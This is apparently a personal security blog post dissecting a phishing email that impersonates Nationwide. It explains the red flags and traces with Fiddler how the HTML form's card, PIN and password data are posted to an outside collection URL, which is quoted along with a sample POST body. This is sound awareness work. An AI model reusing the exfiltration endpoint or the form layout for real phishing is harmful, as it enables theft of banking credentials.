So like most of you I get lots of phishing emails that get captured normally. I do however like to look at them and see what they are doing. This one I got today contains so many things wrong it was worth looking at.

As you can see firstly the “From” name is different to the “Email” address it came from, or should I say the one it tells me it is from. For a financial organization to not use a valid domain for the email would be very rare. Secondly we see an attachment which is in “HTML” format, which just would not happen. Normally organizations like this would send a link to an online service or in reality if it was activity deemed as suspicious they would have called you by now. Lastly we see instructions of completing the form which of course is completely against any security policy.

So what does the form contain?

If we download the “HTML” file and open it up we see that it is encoded.

Of course we could take some time to see what it is doing by breaking open the encoded text, however it is much more fun to see what it looks like in the browser.

How good does that look?

If you hover on the links they all point to valid locations. An example would be the “Getting Started” link on the left which is pointing to the real site “http://www.nationwide.co.uk/support/ways-to-bank/internet-banking/features-and-benefits“.

Notice the glaring issues with the form?

All of the details being asked for would not be needed at all, only as confirmation “maybe“, once you had logged back into your account first. I particularly like how the form asks for all the card details including “ATM Pin” which no financial institution would ever ask for. Then asking for personal details which then will help the attacker to “pretend” to be you.

If we now press the “Continue” button with empty values, we see it even has validation. Notice that I can type whatever I want in those fields and they get confirmed, which in reality would not happen either. Most legitimate sites use some “on-the-fly” validation now to assist with this.

Now let’s “Continue” button after completing the details. We get a little message.

Using fiddler, we can see that it sends some data to a site that is under the financial institution real sites.

However it also tries to submit the data to the following URL.

http://fa.shahidatoot.com/wp-content/plugins/ultimate-posts-widget/submit.php

Once this piece is completed it then redirects back to the valid website for “Nationwide“. Taking a closer look at the steps you can see the flow.

  1. Existing Nationwide site
  2. Custom “Submission” site
  3. Existing Nationwide site

So what was submitted to the “Submission” site?

Using fiddler we can simply select the custom site URL and see the “POST” details. Using the “WebForms“, view we can see all of our data that was posted from the form.

It is sent in the URL as “POST” request.

Using the “TextView” we can see the full “POST” URL.

__token=WIrhIATNh0Qj6GIq6QvJ7E3TW1rkNVGFYnxt7tVchCE%3D&CurrentAccountCardDetailsViewModel.SubmittedCardNumber=1234567890123456&c1=1234&c2=5678&c3=9012&c4=3456&e1=01&e2=15&cvv=123&atm=1234&cst=1234567890&memo=Some+Text&pass=123456

So the word of warning here is to check and check again before you ever use a process like this. If you get an email that looks legit but are not 100% sure, call the organization first to double check, better to be safe than sorry.